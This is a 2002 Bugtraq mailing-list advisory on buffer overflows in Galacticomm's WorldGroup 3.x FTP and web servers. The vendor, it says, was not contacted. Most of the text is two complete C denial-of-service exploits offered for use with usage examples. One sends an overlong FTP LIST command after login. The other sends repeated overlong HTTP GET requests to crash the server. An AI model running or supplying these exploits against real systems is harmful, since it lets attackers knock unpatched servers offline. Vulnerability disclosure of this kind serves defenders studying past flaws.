Dear bugtraq, Topic: buffer overflows in WorldGroup 3.0 ftp and web servers Authors: Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk) Date: February, 25 2002 Software: WorldGroup 3.x Vendor: Galacticomm (http://www.gcomm.com/) (?) Risk: High Remote: Yes Exploitable: Yes Vendor Status: Not contacted, not confirmed Details: Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk) reports buffer overflows in WorldGroup 3.x ftp and web servers by Galacticomm (http://www.gcomm.com/). For FTP server overflow on long LIST command. For HTTP overflow on long request GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0 Vendor: Vendor was not contacted because contact information is not available on the Web site (support only available for registered users). Exploit: DoS exploits by Limpid Byte team (also available from http://www.security.nnov.ru/files/worldgroupdos.zip) ----------------- BEGIN FTP_DOS.C --------------------- /* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk [Worldgroup FTP Server Denial of Service] More than 105 "/" in LIST command. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock.h> #define FOUND "220" int main(int argc, char *argv[]) { int sock; struct sockaddr_in blah; struct hostent *he; char cgiBuff[1024]; char *cgiPage[6]; WSADATA wsaData; char cr[] = "\n"; if (argc < 3) { printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K."); printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r"); printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] "); printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n"); exit(1); } cgiPage[0] = "USER "; cgiPage[1] = (argv[2]); cgiPage[2] = "PASS "; cgiPage[3] = (argv[3]); cgiPage[4] = "PASV"; cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n"; if(WSAStartup(0x101,&wsaData)) { printf("Unable to initialize WinSock lib.\n"); exit(1); } printf("Let's crash the World!\n\r"); printf("Coded by the [eaSt]:\n\r"); printf("\nConnecting %s on port 21...\n\n", argv[1]); sock = socket(AF_INET,SOCK_STREAM,0); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(argv[1]); blah.sin_port=htons(21); if ((he = gethostbyname(argv[1])) != NULL) { memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) { WSACleanup(); exit(1); } } if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) { WSACleanup(); exit(1); } memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf("<< %s", cgiBuff); send(sock,cgiPage[0],strlen(cgiPage[0]),0); send(sock,cgiPage[1],strlen(cgiPage[1]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff); send(sock,cgiPage[2],strlen(cgiPage[2]),0); send(sock,cgiPage[3],strlen(cgiPage[3]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff); send(sock,cgiPage[4],strlen(cgiPage[4]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s\n<< %s", cgiPage[4], cgiBuff); send(sock,cgiPage[5],strlen(cgiPage[5]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s\n<< %s", cgiPage[5], cgiBuff); printf("Try reconnect to %s\n", argv[1]); WSACleanup(); return 0; } ----------------- END FTP_DOS.C --------------------- ----------------- BEGIN WWW_DOS.C --------------------- /* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk Worldgroup Server Denial of Service for Windows 9x/ME only. Error between system fuction windows and worldgroup from web interface. REGUEST: GET /signup/a.[aaaaaaaa....aaaa] */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock.h> #define FOUND "200" int main(int argc, char *argv[]) { int sock, count; struct sockaddr_in blah; struct hostent *he; char cgiBuff[1024]; WSADATA wsaData; if (argc < 2) { printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n"); printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n"); printf(" USAGE : www_dos.exe [HOST] \n"); printf(" example : www_dos.exe 127.0.0.1 \n"); exit(1); } if(WSAStartup(0x101,&wsaData)) { printf("Unable to initialize WinSock lib.\n"); exit(1); } printf("Let's crash the World!\n"); printf("Coded by the [eaSt]:\n"); printf("\nScanning %s on port 80...\n\n", argv[1]); for (count = 0; count < 94; count++) { sock = socket(AF_INET,SOCK_STREAM,0); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(argv[1]); blah.sin_port=htons(80); if ((he = gethostbyname(argv[1])) != NULL) { memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) { WSACleanup(); exit(1); } } if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) { WSACleanup(); exit(1); } memset(cgiBuff, 0, sizeof(cgiBuff)); sprintf(cgiBuff, "GET /signup/"); memset(cgiBuff + 12, 'a', 219 + count); sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n"); printf("Sending: %d symbols request\n", strlen(cgiBuff)); send(sock,cgiBuff,strlen(cgiBuff),0); memset(cgiBuff, 0, sizeof(cgiBuff)); if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) { printf("Crashed\n"); } else { cgiBuff[32] = 0; if (strstr(cgiBuff,FOUND)) { printf("Send (%s)\n", cgiBuff); } else { printf("Not Found (%s)\n", cgiBuff); } } closesocket(sock); } printf("Try reconnect to %s\n", argv[1]); WSACleanup(); return 0; } ----------------- END WWW_DOS.C --------------------- -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)
